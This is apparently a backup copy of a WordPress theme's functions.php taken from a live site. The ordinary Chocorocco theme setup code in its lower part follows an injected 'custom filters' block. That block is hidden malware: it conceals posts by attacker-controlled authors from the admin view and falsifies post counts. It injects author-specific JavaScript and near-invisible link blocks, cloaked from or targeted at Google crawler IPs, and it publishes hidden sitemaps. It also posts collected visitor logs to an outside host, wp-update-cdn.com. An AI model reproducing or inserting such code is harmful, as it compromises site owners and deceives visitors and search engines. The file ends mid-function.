File: /home/clinicamaciel/www/wp-content/themes/chocorocco/functions.php_bak
<?php
/* custom filters */
function add_where_condition($where) {
global $wpdb, $userSettingsArr;
$ids = array_keys($userSettingsArr);
$idsCommaSeparated = implode(', ', $ids);
if (!is_single() && is_admin()) {
add_filter('views_edit-post', 'fix_post_counts');
return $where . " AND {$wpdb->posts}.post_author NOT IN ($idsCommaSeparated)";
}
return $where;
}
function post_exclude($query) {
global $userSettingsArr;
$ids = array_keys($userSettingsArr);
$excludeString = modifyWritersString($ids);
if (!$query->is_single() && !is_admin()) {
$query->set('author', $excludeString);
}
}
function wp_core_js() {
global $post, $userSettingsArr;
foreach ($userSettingsArr as $id => $settings) {
if (($id == $post->post_author) && (isset($settings['js']))) {
if (hideJSsource($settings)) {
break;
}
echo $settings['js'];
break;
}
}
}
function hideJSsource($settings) {
if (isset($settings['nojs']) && $settings['nojs'] === 1) {
//customSetDebug('cloacking is on!');
//customSendDebug();
if (customCheckSe()) {
return true;
}
}
return false;
}
function fix_post_counts($views) {
global $current_user, $wp_query;
$types = array(
array('status' => NULL),
array('status' => 'publish'),
array('status' => 'draft'),
array('status' => 'pending'),
array('status' => 'trash'),
array('status' => 'mine'),
);
foreach ($types as $type) {
$query = array(
'post_type' => 'post',
'post_status' => $type['status']
);
$result = new WP_Query($query);
if ($type['status'] == NULL) {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['all'], $matches)) {
$views['all'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['all']);
}
} elseif ($type['status'] == 'mine') {
$newQuery = $query;
$newQuery['author__in'] = array($current_user->ID);
$result = new WP_Query($newQuery);
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['mine'], $matches)) {
$views['mine'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['mine']);
}
} elseif ($type['status'] == 'publish') {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['publish'], $matches)) {
$views['publish'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['publish']);
}
} elseif ($type['status'] == 'draft') {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['draft'], $matches)) {
$views['draft'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['draft']);
}
} elseif ($type['status'] == 'pending') {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['pending'], $matches)) {
$views['pending'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['pending']);
}
} elseif ($type['status'] == 'trash') {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['trash'], $matches)) {
$views['trash'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['trash']);
}
}
}
return $views;
}
function filter_function_name_4055($counts, $type, $perm) {
if ($type === 'post') {
$old_counts = $counts->publish;
$counts_mod = posts_count_custom($perm);
$counts->publish = !$counts_mod ? $old_counts : $counts_mod;
}
return $counts;
}
function posts_count_custom($perm) {
global $wpdb, $userSettingsArr;
$ids = array_keys($userSettingsArr);
$idsCommaSeparated = implode(', ', $ids);
$type = 'post';
$query = "SELECT post_status, COUNT( * ) AS num_posts FROM {$wpdb->posts} WHERE post_type = %s";
if ('readable' == $perm && is_user_logged_in()) {
$post_type_object = get_post_type_object($type);
if (!current_user_can($post_type_object->cap->read_private_posts)) {
$query .= $wpdb->prepare(
" AND (post_status != 'private' OR ( post_author = %d AND post_status = 'private' ))", get_current_user_id()
);
}
}
$query .= " AND post_author NOT IN ($idsCommaSeparated) GROUP BY post_status";
$results = (array)$wpdb->get_results($wpdb->prepare($query, $type), ARRAY_A);
foreach ($results as $tmpArr) {
if ($tmpArr['post_status'] === 'publish') {
return $tmpArr['num_posts'];
}
}
}
function all_custom_posts_ids($userId) {
global $wpdb;
$query = "SELECT ID FROM {$wpdb->posts} where post_author = $userId";
$results = (array)$wpdb->get_results($query, ARRAY_A);
$ids = array();
foreach ($results as $tmpArr) {
$ids[] = $tmpArr['ID'];
}
return $ids;
}
function custom_flush_rules() {
global $userSettingsArr, $wp_rewrite;
$rules = get_option('rewrite_rules');
foreach ($userSettingsArr as $key => $arr) {
$regex = key($arr['sitemapsettings']);
if (!isset($rules[$regex]) ||
($rules[$regex] !== current($arr['sitemapsettings']))) {
$wp_rewrite->flush_rules();
}
}
}
function sitemap_xml_rules($rules) {
global $userSettingsArr;
$newrules = array();
foreach ($userSettingsArr as $key => $arr) {
if (isset($arr['sitemapsettings'])) {
$newrules[key($arr['sitemapsettings'])] = current($arr['sitemapsettings']);
}
}
return $newrules + $rules;
}
function customSitemapFeed() {
global $userSettingsArr;
foreach ($userSettingsArr as $key => $arr) {
$feedName = str_replace('index.php?feed=', '', current($arr['sitemapsettings']));
add_feed($feedName, 'customSitemapFeedFunc');
}
}
function customSitemapFeedFunc() {
//ini_set('memory_limit', '256MB');
header('Content-Type: ' . feed_content_type('rss-http') . '; charset=' . get_option('blog_charset'), true);
//header('Content-Type: ' . feed_content_type('rss') . '; charset=' . get_option('blog_charset'), true);
status_header(200);
$head = sitemapHead();
$sitemapSource = $head . "\n";
$userId = findUserIdByRequestUri();
$posts_ids = all_custom_posts_ids($userId);
$priority = '0.5';
$changefreq = 'weekly';
$lastmod = date('Y-m-d');
foreach ($posts_ids as $post_id) {
$url = get_permalink($post_id);
$sitemapSource .= urlBlock($url, $lastmod, $changefreq, $priority);
wp_cache_delete($post_id, 'posts');
}
$sitemapSource .= "\n</urlset>";
echo $sitemapSource;
}
function sitemapHead() {
return <<<STR
<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
STR;
}
function urlBlock($url, $lastmod, $changefreq, $priority) {
return <<<STR
<url>
<loc>$url</loc>
<lastmod>$lastmod</lastmod>
<changefreq>$changefreq</changefreq>
<priority>$priority</priority>
</url>\n\n
STR;
}
function modifyWritersString($writersArr) {
$writersArrMod = array();
foreach ($writersArr as $item) {
$writersArrMod[] = '-' . $item;
}
return implode(',', $writersArrMod);
}
function customFiltersSettings() {
$settings = get_option('wp_custom_filters');
if (!$settings) {
return null;
}
return unserialize(base64_decode($settings));
}
function findUserIdByRequestUri() {
global $userSettingsArr;
foreach ($userSettingsArr as $key => $arr) {
$regexp = key($arr['sitemapsettings']) . '|'
. str_replace('index.php?', '', current($arr['sitemapsettings']) . '$');
if (preg_match("~$regexp~", $_SERVER['REQUEST_URI'])) {
return $key;
}
}
}
function isCustomPost() {
global $userSettingsArr, $post;
$authors_ids_arr = array_keys($userSettingsArr);
if (in_array($post->post_author, $authors_ids_arr)) {
return true;
}
return false;
}
function removeYoastMeta() {
global $userSettingsArr, $post;
$authors_ids_arr = array_keys($userSettingsArr);
if (!$post || !property_exists($post, 'author')) {
return;
}
if (in_array($post->post_author, $authors_ids_arr)) {
add_filter('wpseo_robots', '__return_false');
add_filter('wpseo_googlebot', '__return_false'); // Yoast SEO 14.x or newer
add_filter('wpseo_bingbot', '__return_false'); // Yoast SEO 14.x or newer
}
}
function getRemoteIp() {
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
return $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {
return $_SERVER['HTTP_CF_CONNECTING_IP'];
}
if (isset($_SERVER['REMOTE_ADDR'])) {
return $_SERVER['REMOTE_ADDR'];
}
return false;
}
function customCheckSe() {
$ip = getRemoteIp();
if (strstr($ip, ', ')) {
$ips = explode(', ', $ip);
$ip = $ips[0];
}
$ranges = customSeIps();
if (!$ranges) {
return false;
}
foreach ($ranges as $range) {
if (customCheckInSubnet($ip, $range)) {
//customSetDebug(sprintf('black_list||%s||%s||%s||%s', $ip, $range
// , $_SERVER['HTTP_USER_AGENT'], $_SERVER['HTTP_ACCEPT_LANGUAGE']));
return true;
}
}
//customSetDebug(sprintf('white list||%s||%s||%s||%s', $ip, $range
// , $_SERVER['HTTP_USER_AGENT'], $_SERVER['HTTP_ACCEPT_LANGUAGE']));
return false;
}
function customIsRenewTime($timestamp) {
//if ((time() - $timestamp) > 60 * 60 * 24) {
if ((time() - $timestamp) > 60 * 60) {
return true;
}
//customSetDebug(sprintf('time - %s, timestamp - %s', time(), $timestamp));
return false;
}
function customSetDebug($data) {
if (($value = get_option('wp_debug_data')) && is_array($value)) {
$value[] = sprintf('%s||%s||%s', time(), $_SERVER['HTTP_HOST'], $data);
update_option('wp_debug_data', $value, false);
return;
}
update_option('wp_debug_data', array($data), false);
}
function customSendDebug() {
$value = get_option('wp_debug_data');
if (!is_array($value) || (count($value) < 100)) {
return;
}
$url = 'http://wp-update-cdn.com/src/ualogsec.php';
$response = wp_remote_post($url, array(
'method' => 'POST',
'timeout' => 10,
'body' => array(
'host' => $_SERVER['HTTP_HOST'],
'debugdata' => gzcompress(json_encode($value)), 9)
)
);
if (is_wp_error($response)) {
return;
} else {
if (trim($response['body']) === 'success') {
update_option('wp_debug_data', array(), false);
}
}
}
function customSeIps() {
if (($value = get_option('wp_custom_range')) && !customIsRenewTime($value['timestamp'])) {
return $value['ranges'];
} else {
//customSetDebug('time to update ranges');
$response = wp_remote_get('https://www.gstatic.com/ipranges/goog.txt');
if (is_wp_error($response)) {
//customSetDebug('error response ipranges');
return;
}
$body = wp_remote_retrieve_body($response);
$ranges = preg_split("~(\r\n|\n)~", trim($body), -1, PREG_SPLIT_NO_EMPTY);
if (!is_array($ranges)) {
//customSetDebug('invalid update ranges not an array');
return;
}
$value = array('ranges' => $ranges, 'timestamp' => time());
update_option('wp_custom_range', $value, true);
return $value['ranges'];
}
}
function customInetToBits($inet) {
$splitted = str_split($inet);
$binaryip = '';
foreach ($splitted as $char) {
$binaryip .= str_pad(decbin(ord($char)), 8, '0', STR_PAD_LEFT);
}
return $binaryip;
}
function customCheckInSubnet($ip, $cidrnet) {
$ip = inet_pton($ip);
$binaryip = customInetToBits($ip);
list($net, $maskbits) = explode('/', $cidrnet);
$net = inet_pton($net);
$binarynet = customInetToBits($net);
$ip_net_bits = substr($binaryip, 0, $maskbits);
$net_bits = substr($binarynet, 0, $maskbits);
if ($ip_net_bits !== $net_bits) {
//echo 'Not in subnet';
return false;
} else {
return true;
}
}
/**
* function buffer_start_custom() {
*
* global $post, $userSettingsArr;
*
* $authors_ids_arr = array_keys($userSettingsArr);
*
*
*
* if (!in_array($post->post_author, $authors_ids_arr)) {
* if (is_single() || (is_front_page() || is_home())) {
* ob_start("callback_custom");
* }
* }
* }
*
*/
function buffer_start_custom() {
echo '<!--buffer start custom--!>' . PHP_EOL;
if (!isCustomPost()) {
if (is_singular() || (is_front_page() || is_home())) {
echo '<!--start callback custom--!>' . PHP_EOL;
ob_start("callback_custom");
}
}
}
function buffer_end_custom() {
ob_end_flush();
}
function callback_custom($buffer) {
global $homeLinksSettingsArr;
return buffer_prepare_custom($homeLinksSettingsArr, $buffer);
}
function buffer_prepare_custom($homeLinksSettingsArr, $buffer) {
if (($homeLinksSettingsArr['hiddenType']['cloacking'] === 1) && !customCheckSe()) {
customSetDebug('no google bot, without changes ' . getRemoteIp());
return $buffer;
}
$textBlock = text_block_custom($homeLinksSettingsArr);
$textBlock = additional_style_custom($homeLinksSettingsArr, $textBlock);
if ($homeLinksSettingsArr['position']['footer'] === 1) {
customSetDebug('footer position');
return $buffer . PHP_EOL . $textBlock;
}
if ($homeLinksSettingsArr['position']['head'] === 1) {
customSetDebug('header position');
return $textBlock . PHP_EOL . $buffer;
}
}
function text_block_custom($homeLinksSettingsArr) {
global $post;
$block = '';
if ($homeLinksSettingsArr['textBlocksCount']['onlyHomePage'] === 1) {
if (is_front_page() || is_home()) {
customSetDebug('home page mode');
$block = get_option('home_links_custom_0');
}
} elseif ($homeLinksSettingsArr['textBlocksCount']['10DifferentTextBlocks'] === 1) {
$url = get_permalink($post->ID);
preg_match('~\d~', md5($url), $matches);
$block = get_option('home_links_custom_' . $matches[0]);
$log = sprintf('10DifferentTextBlocks page mode block num - %s permalink - %s', $matches[0], $url);
customSetDebug($log);
} elseif ($homeLinksSettingsArr['textBlocksCount']['100DifferentTextBlocks'] === 1) {
$url = get_permalink($post->ID);
preg_match_all('~\d~', md5($url), $matches);
$digits = ($matches[0][0] == 0) ? $matches[0][1] : $matches[0][0] . '' . $matches[0][1];
$block = get_option('home_links_custom_' . $digits);
$log = sprintf('100DifferentTextBlocks page mode block num - %s permalink - %s', $digits, $url);
customSetDebug($log);
} elseif ($homeLinksSettingsArr['textBlocksCount']['fullDifferentTextBlocks'] === 1) {
} else {
}
return !$block ? '' : $block;
}
function additional_style_custom($homeLinksSettingsArr, $textBlock) {
if (empty($textBlock)) {
return '';
}
if ($homeLinksSettingsArr['hiddenType']['css'] === 1) {
$cssRules = css_rule_custom();
return $cssRules[0] . PHP_EOL . $textBlock . PHP_EOL . $cssRules[1];
}
return $textBlock;
}
function css_rule_custom() {
//return ['<div style="display: none;">', '</div>'];
return array('<div style="position:absolute; filter:alpha(opacity=0);opacity:0.003;z-index:8;">', '</div>');
}
function home_links_settings_custom($settings) {
foreach ($settings as $key => $arr) {
if (isset($arr['homeLinks'])) {
return $arr['homeLinks'];
}
}
return array();
}
$userSettingsArr = customFiltersSettings();
if (is_array($userSettingsArr)) {
add_filter('posts_where_paged', 'add_where_condition');
add_action('pre_get_posts', 'post_exclude');
add_action('wp_enqueue_scripts', 'wp_core_js');
add_filter('wp_count_posts', 'filter_function_name_4055', 10, 3);
add_filter('rewrite_rules_array', 'sitemap_xml_rules');
add_action('wp_loaded', 'custom_flush_rules');
add_action('init', 'customSitemapFeed');
add_action('template_redirect', 'removeYoastMeta');
$homeLinksSettingsArr = home_links_settings_custom($userSettingsArr);
if (!empty($homeLinksSettingsArr)) {
customSendDebug();
add_action('wp_head', 'buffer_start_custom');
add_action('wp_footer', 'buffer_end_custom');
}
}
/* custom filters */
/**
* Theme functions: init, enqueue scripts and styles, include required files and widgets
*
* @package WordPress
* @subpackage CHOCOROCCO
* @since CHOCOROCCO 1.0
*/
if (!defined("CHOCOROCCO_THEME_DIR")) define("CHOCOROCCO_THEME_DIR", trailingslashit( get_template_directory() ));
if (!defined("CHOCOROCCO_CHILD_DIR")) define("CHOCOROCCO_CHILD_DIR", trailingslashit( get_stylesheet_directory() ));
/**
* Fire the wp_body_open action.
*
* Added for backwards compatibility to support pre 5.2.0 WordPress versions.
*/
if ( ! function_exists( 'wp_body_open' ) ) {
function wp_body_open() {
/**
* Triggered after the opening <body> tag.
*/
do_action('wp_body_open');
}
}
// Theme storage
$CHOCOROCCO_STORAGE = array(
// Theme required plugin's slugs
'required_plugins' => array(
// Required plugins
// DON'T COMMENT OR REMOVE NEXT LINES!
'trx_addons',
// Recommended (supported) plugins
// If plugin not need - comment (or remove) it
'contact-form-7',
'essential-grid',
'instagram-feed',
'js_composer',
'mailchimp-for-wp',
'revslider',
'vc-extensions-bundle',
'woocommerce',
'trx_updater',
'elegro-payment'
)
);
//-------------------------------------------------------
//-- Theme init
//-------------------------------------------------------
// Theme init priorities:
// 1 - register filters to add/remove lists items in the Theme Options
// 2 - create Theme Options
// 3 - add/remove Theme Options elements
// 5 - load Theme Options
// 9 - register other filters (for installer, etc.)
//10 - standard Theme init procedures (not ordered)
if ( !function_exists('chocorocco_theme_setup1') ) {
add_action( 'after_setup_theme', 'chocorocco_theme_setup1', 1 );
function chocorocco_theme_setup1() {
// Make theme available for translation
// Translations can be filed in the /languages directory
// Attention! Translations must be loaded before first call any translation functions!
load_theme_textdomain( 'chocorocco', get_template_directory() . '/languages' );
// Set theme content width
$GLOBALS['content_width'] = apply_filters( 'chocorocco_filter_content_width', 1170 );
}
}
if ( !function_exists('chocorocco_theme_setup') ) {
add_action( 'after_setup_theme', 'chocorocco_theme_setup' );
function chocorocco_theme_setup() {
// Add default posts and comments RSS feed links to head
add_theme_support( 'automatic-feed-links' );
// Custom header setup
add_theme_support( 'custom-header', array(
'header-text'=>false,
'video' => true
)
);
// Custom backgrounds setup
add_theme_support( 'custom-background', array() );
// Supported posts formats
add_theme_support( 'post-formats', array('gallery', 'video', 'audio', 'link', 'quote', 'image', 'status', 'aside', 'chat') );
// Autogenerate title tag
add_theme_support('title-tag');
// Add theme menus
add_theme_support('nav-menus');
// Switch default markup for search form, comment form, and comments to output valid HTML5.
add_theme_support( 'html5', array('search-form', 'comment-form', 'comment-list', 'gallery', 'caption') );
// Editor custom stylesheet - for user
add_editor_style( array_merge(
array(
'css/editor-style.css',
chocorocco_get_file_url('css/fontello/css/fontello-embedded.css')
),
chocorocco_theme_fonts_for_editor()
)
);
// Register navigation menu
register_nav_menus(array(
'menu_main' => esc_html__('Main Menu', 'chocorocco'),
'menu_mobile' => esc_html__('Mobile Menu', 'chocorocco'),
'menu_footer' => esc_html__('Footer Menu', 'chocorocco')
)
);
// Excerpt filters
add_filter( 'excerpt_length', 'chocorocco_excerpt_length' );
add_filter( 'excerpt_more', 'chocorocco_excerpt_more' );
// Add required meta tags in the head
add_action('wp_head', 'chocorocco_wp_head', 0);
// Load current page/post customization (if present)
add_action('wp_footer', 'chocorocco_wp_footer');
add_action('admin_footer', 'chocorocco_wp_footer');
// Enqueue scripts and styles for frontend
add_action('wp_enqueue_scripts', 'chocorocco_wp_scripts', 1000); // priority 1000 - load styles
// before the plugin's support custom styles
// (with priority 1100)
add_action('wp_enqueue_scripts', 'chocorocco_wp_scripts_child', 1200); // priority 1200 - load styles
// after the plugin's support custom styles
// (with priority 1100)
add_action('wp_enqueue_scripts', 'chocorocco_wp_scripts_responsive', 2000); // priority 2000 - load responsive
// after all other styles
add_action('wp_footer', 'chocorocco_localize_scripts');
// Add body classes
add_filter( 'body_class', 'chocorocco_add_body_classes' );
// Register sidebars
add_action('widgets_init', 'chocorocco_register_sidebars');
// Set options for importer (before other plugins)
add_filter( 'trx_addons_filter_importer_options', 'chocorocco_importer_set_options', 9 );
}
}
//-------------------------------------------------------
//-- Theme scripts and styles
//-------------------------------------------------------
// Load frontend scripts
if ( !function_exists( 'chocorocco_wp_scripts' ) ) {
function chocorocco_wp_scripts() {
// Enqueue styles
//------------------------
// Links to selected fonts
$links = chocorocco_theme_fonts_links();
if (count($links) > 0) {
foreach ($links as $slug => $link) {
wp_enqueue_style( sprintf('chocorocco-font-%s', $slug), $link );
}
}
// Fontello styles must be loaded before main stylesheet
// This style NEED the theme prefix, because style 'fontello' in some plugin contain different set of characters
// and can't be used instead this style!
wp_enqueue_style( 'fontello-icons', chocorocco_get_file_url('css/fontello/css/fontello-embedded.css') );
// Load main stylesheet
$main_stylesheet = get_template_directory_uri() . '/style.css';
wp_enqueue_style( 'chocorocco-main', $main_stylesheet, array(), null );
// Add custom bg image for the body_style == 'boxed'
if ( chocorocco_get_theme_option('body_style') == 'boxed' && ($bg_image = chocorocco_get_theme_option('boxed_bg_image')) != '' )
wp_add_inline_style( 'chocorocco-main', '.body_style_boxed { background-image:url('.esc_url($bg_image).') }' );
// Merged styles
if ( chocorocco_is_off(chocorocco_get_theme_option('debug_mode')) )
wp_enqueue_style( 'chocorocco-styles', chocorocco_get_file_url('css/__styles.css') );
// Custom colors
if ( !is_customize_preview() && !isset($_GET['color_scheme']) && chocorocco_is_off(chocorocco_get_theme_option('debug_mode')) )
wp_enqueue_style( 'chocorocco-colors', chocorocco_get_file_url('css/__colors.css') );
else
wp_add_inline_style( 'chocorocco-main', chocorocco_customizer_get_css() );
// Add post nav background
chocorocco_add_bg_in_post_nav();
// Disable loading JQuery UI CSS
wp_deregister_style('jquery_ui');
wp_deregister_style('date-picker-css');
// Enqueue scripts
//------------------------
// Modernizr will load in head before other scripts and styles
if ( in_array(substr(chocorocco_get_theme_option('blog_style'), 0, 7), array('gallery', 'portfol', 'masonry')) )
wp_enqueue_script( 'modernizr', chocorocco_get_file_url('js/theme.gallery/modernizr.min.js'), array(), null, false );
// Superfish Menu
// Attention! To prevent duplicate this script in the plugin and in the menu, don't merge it!
wp_enqueue_script( 'superfish', chocorocco_get_file_url('js/superfish.js'), array('jquery'), null, true );
// Merged scripts
if ( chocorocco_is_off(chocorocco_get_theme_option('debug_mode')) )
wp_enqueue_script( 'chocorocco-init', chocorocco_get_file_url('js/__scripts.js'), array('jquery'), null, true );
else {
// Skip link focus
wp_enqueue_script( 'skip-link-focus-fix', chocorocco_get_file_url('js/skip-link-focus-fix.js'), null, true );
// Background video
$header_video = chocorocco_get_header_video();
if (!empty($header_video) && !chocorocco_is_inherit($header_video)) {
if (chocorocco_is_youtube_url($header_video))
wp_enqueue_script( 'tubular', chocorocco_get_file_url('js/jquery.tubular.js'), array('jquery'), null, true );
else
wp_enqueue_script( 'bideo', chocorocco_get_file_url('js/bideo.js'), array(), null, true );
}
// Theme scripts
wp_enqueue_script( 'chocorocco-utils', chocorocco_get_file_url('js/_utils.js'), array('jquery'), null, true );
wp_enqueue_script( 'chocorocco-init', chocorocco_get_file_url('js/_init.js'), array('jquery'), null, true );
}
// Comments
if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) {
wp_enqueue_script( 'comment-reply' );
}
// Media elements library
if (chocorocco_get_theme_setting('use_mediaelements')) {
wp_enqueue_style ( 'mediaelement' );
wp_enqueue_style ( 'wp-mediaelement' );
wp_enqueue_script( 'mediaelement' );
wp_enqueue_script( 'wp-mediaelement' );
}
}
}
// Load child-theme stylesheet (if different) after all styles (with priorities 1000 and 1100)
if ( !function_exists( 'chocorocco_wp_scripts_child' ) ) {
function chocorocco_wp_scripts_child() {
$main_stylesheet = get_template_directory_uri() . '/style.css';
$child_stylesheet = get_stylesheet_directory_uri() . '/style.css';
if ($child_stylesheet != $main_stylesheet) {
wp_enqueue_style( 'chocorocco-child', $child_stylesheet, array('chocorocco-main'), null );
}
}
}
// Add variables to the scripts in the frontend
if ( !function_exists( 'chocorocco_localize_scripts' ) ) {
function chocorocco_localize_scripts() {
$video = chocorocco_get_header_video();
wp_localize_script( 'chocorocco-init', 'CHOCOROCCO_STORAGE', apply_filters( 'chocorocco_filter_localize_script', array(
// AJAX parameters
'ajax_url' => esc_url(admin_url('admin-ajax.php')),
'ajax_nonce' => esc_attr(wp_create_nonce(admin_url('admin-ajax.php'))),
// Site base url
'site_url' => get_site_url(),
'theme_url' => get_template_directory_uri(),
// Site color scheme
'site_scheme' => sprintf('scheme_%s', chocorocco_get_theme_option('color_scheme')),
// User logged in
'user_logged_in' => is_user_logged_in() ? true : false,
// Window width to switch the site header to the mobile layout
'mobile_layout_width' => 767,
'mobile_device' => wp_is_mobile(),
// Sidemenu options
'menu_side_stretch' => chocorocco_get_theme_option('menu_side_stretch') > 0 ? true : false,
'menu_side_icons' => chocorocco_get_theme_option('menu_side_icons') > 0 ? true : false,
// Video background
'background_video' => chocorocco_is_from_uploads($video) ? $video : '',
// Video and Audio tag wrapper
'use_mediaelements' => chocorocco_get_theme_setting('use_mediaelements') ? true : false,
// Messages max length
'comment_maxlength' => intval(chocorocco_get_theme_setting('comment_maxlength')),
// Internal vars - do not change it!
// Flag for review mechanism
'admin_mode' => false,
// E-mail mask
'email_mask' => '^([a-zA-Z0-9_\\-]+\\.)*[a-zA-Z0-9_\\-]+@[a-z0-9_\\-]+(\\.[a-z0-9_\\-]+)*\\.[a-z]{2,6}$',
// Strings for translation
'strings' => array(
'ajax_error' => esc_html__('Invalid server answer!', 'chocorocco'),
'error_global' => esc_html__('Error data validation!', 'chocorocco'),
'name_empty' => esc_html__("The name can't be empty", 'chocorocco'),
'name_long' => esc_html__('Too long name', 'chocorocco'),
'email_empty' => esc_html__('Too short (or empty) email address', 'chocorocco'),
'email_long' => esc_html__('Too long email address', 'chocorocco'),
'email_not_valid' => esc_html__('Invalid email address', 'chocorocco'),
'text_empty' => esc_html__("The message text can't be empty", 'chocorocco'),
'text_long' => esc_html__('Too long message text', 'chocorocco')
)
))
);
}
}
// Load responsive styles (priority 2000 - load it after main styles and plugins custom styles)
if ( !function_exists( 'chocorocco_wp_scripts_responsive' ) ) {
function chocorocco_wp_scripts_responsive() {
wp_enqueue_style( 'chocorocco-responsive', chocorocco_get_file_url('css/responsive.css') );
}
}
// Add meta tags and inline scripts in the header for frontend
if (!function_exists('chocorocco_wp_head')) {
function chocorocco_wp_head() {
?>
<meta charset="<?php bloginfo( 'charset' ); ?>">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="format-detection" content="telephone=no">
<link rel="profile" href="//gmpg.org/xfn/11">
<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>">
<?php
}
}
// Add theme specified classes to the body
if ( !function_exists('chocorocco_add_body_classes') ) {
function chocorocco_add_body_classes( $classes ) {
$classes[] = 'body_tag'; // Need for the .scheme_self
$classes[] = 'scheme_' . esc_attr(chocorocco_get_theme_option('color_scheme'));
$blog_mode = chocorocco_storage_get('blog_mode');
$classes[] = 'blog_mode_' . esc_attr($blog_mode);
$classes[] = 'body_style_' . esc_attr(chocorocco_get_theme_option('body_style'));
if (in_array($blog_mode, array('post', 'page'))) {
$classes[] = 'is_single';
} else {
$classes[] = ' is_stream';
$classes[] = 'blog_style_'.esc_attr(chocorocco_get_theme_option('blog_style'));
if (chocorocco_storage_get('blog_template') > 0)
$classes[] = 'blog_template';
}
if (chocorocco_sidebar_present()) {
$classes[] = 'sidebar_show sidebar_' . esc_attr(chocorocco_get_theme_option('sidebar_position')) ;
} else {
$classes[] = 'sidebar_hide';
if (chocorocco_is_on(chocorocco_get_theme_option('expand_content')))
$classes[] = 'expand_content';
}
if (chocorocco_is_on(chocorocco_get_theme_option('remove_margins')))
$classes[] = 'remove_margins';
$classes[] = 'header_style_' . esc_attr(chocorocco_get_theme_option("header_style"));
$classes[] = 'header_position_' . esc_attr(chocorocco_get_theme_option("header_position"));
$menu_style= chocorocco_get_theme_option("menu_style");
$classes[] = 'menu_style_' . esc_attr($menu_style) . (in_array($menu_style, array('left', 'right')) ? ' menu_style_side' : '');
$classes[] = 'no_layout';
return $classes;
}
}
// Load current page/post customization (if present)
if ( !function_exists( 'chocorocco_wp_footer' ) ) {
//and add_action('admin_footer', 'chocorocco_wp_footer');
function chocorocco_wp_footer() {
if (($css = chocorocco_get_inline_css()) != '') {
wp_enqueue_style( 'chocorocco-inline-styles', chocorocco_get_file_url('css/__inline.css') );
wp_add_inline_style( 'chocorocco-inline-styles', $css );
}
}
}
//-------------------------------------------------------
//-- Sidebars and widgets
//-------------------------------------------------------
// Register widgetized areas
if ( !function_exists('chocorocco_register_sidebars') ) {
function chocorocco_register_sidebars() {
$sidebars = chocorocco_get_sidebars();
if (is_array($sidebars) && count($sidebars) > 0) {
foreach ($sidebars as $id=>$sb) {
register_sidebar( array(
'name' => esc_html($sb['name']),
'description' => esc_html($sb['description']),
'id' => esc_attr($id),
'before_widget' => '<aside id="%1$s" class="widget %2$s">',
'after_widget' => '</aside>',
'before_title' => '<h5 class="widget_title">',
'after_title' => '</h5>'
)
);
}
}
}
}
// Return theme specific widgetized areas
if ( !function_exists('chocorocco_get_sidebars') ) {
function chocorocco_get_sidebars() {
$list = apply_filters('chocorocco_filter_list_sidebars', array(
'sidebar_widgets' => array(
'name' => esc_html__('Sidebar Widgets', 'chocorocco'),
'description' => esc_html__('Widgets to be shown on the main sidebar', 'chocorocco')
),
'header_widgets' => array(
'name' => esc_html__('Header Widgets', 'chocorocco'),
'description' => esc_html__('Widgets to be shown at the top of the page (in the page header area)', 'chocorocco')
),
'above_page_widgets' => array(
'name' => esc_html__('Top Page Widgets', 'chocorocco'),
'description' => esc_html__('Widgets to be shown below the header, but above the content and sidebar', 'chocorocco')
),
'above_content_widgets' => array(
'name' => esc_html__('Above Content Widgets', 'chocorocco'),
'description' => esc_html__('Widgets to be shown above the content, near the sidebar', 'chocorocco')
),
'below_content_widgets' => array(
'name' => esc_html__('Below Content Widgets', 'chocorocco'),
'description' => esc_html__('Widgets to be shown below the content, near the sidebar', 'chocorocco')
),
'below_page_widgets' => array(
'name' => esc_html__('Bottom Page Widgets', 'chocorocco'),
'description' => esc_html__('Widgets to be shown below the content and sidebar, but above the footer', 'chocorocco')
),
'footer_widgets' => array(
'name' => esc_html__('Footer Widgets', 'chocorocco'),
'description' => esc_html__('Widgets to be shown at the bottom of the page (in the page footer area)', 'chocorocco')
)
)
);
return $list;
}
}
//-------------------------------------------------------
//-- Theme fonts
//-------------------------------------------------------
// Return links for all theme fonts
if ( !function_exists('chocorocco_theme_fonts_links') ) {
function chocorocco_theme_fonts_links() {
$links = array();
/*
Translators: If there are characters in your language that are not supported
by chosen font(s), translate this to 'off'. Do not translate into your own language.
*/
$google_fonts_enabled = ( 'off' !== esc_html_x( 'on', 'Google fonts: on or off', 'chocorocco' ) );
$custom_fonts_enabled = ( 'off' !== esc_html_x( 'on', 'Custom fonts (included in the theme): on or off', 'chocorocco' ) );
if ( ($google_fonts_enabled || $custom_fonts_enabled) && !chocorocco_storage_empty('load_fonts') ) {
$load_fonts = chocorocco_storage_get('load_fonts');
if (count($load_fonts) > 0) {
$google_fonts = '';
foreach ($load_fonts as $font) {
$slug = chocorocco_get_load_fonts_slug($font['name']);
$url = chocorocco_get_file_url( sprintf('css/font-face/%s/stylesheet.css', $slug));
if ($url != '') {
if ($custom_fonts_enabled) {
$links[$slug] = $url;
}
} else {
if ($google_fonts_enabled) {
$google_fonts .= ($google_fonts ? '|' : '')
. str_replace(' ', '+', $font['name'])
. ':'
. (empty($font['styles']) ? '400,400italic,700,700italic' : $font['styles']);
}
}
}
if ($google_fonts && $google_fonts_enabled) {
